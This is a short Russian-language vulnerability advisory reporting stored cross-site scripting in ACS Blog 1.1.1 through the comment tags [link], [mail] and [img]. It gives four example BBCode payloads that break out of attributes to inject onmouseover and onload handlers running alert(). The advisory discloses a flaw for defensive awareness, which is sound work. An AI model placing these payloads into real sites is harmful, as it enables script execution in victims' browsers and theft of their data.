Программа: ACS Blog 1.1.1

Обнаруженная уязвимость позволяет
удаленному пользователю произвести XSS
нападение и получить доступ к потенциально
важным данным других пользователей.
Уязвимость существует из-за некорректной
обработки входных данных в комментариях в
тегах [link], [mail], и [img]. Удаленный пользователь
может с помощью специально сформированного
тега опубликовать злонамеренный HTML
сценарий и выполнить его в браузере жертвы
в контексте безопасности уязвимого сайта.

Пример:

[link=http://www.google.com' onmouseover='alert("XSS vulnerability")'o=']
Don't you wanna see where this link goes?[/link]

[mail=bugtraq@securityfocus.com' onmouseover=' alert("XSS vulnerability")'
o=']Mr. Wiggles[/mail]

[img]http://www.example.com/image.jpg' onload=' alert("XSS vulnerability")'
o='[/img]

[link=http://www.google.com target=_blank'onmouseover =a=/Vulnerability/;alert(a.source)
o=']Hooray[/link]

Подписаться
Уведомить о
0 комментариев
Межтекстовые Отзывы
Посмотреть все комментарии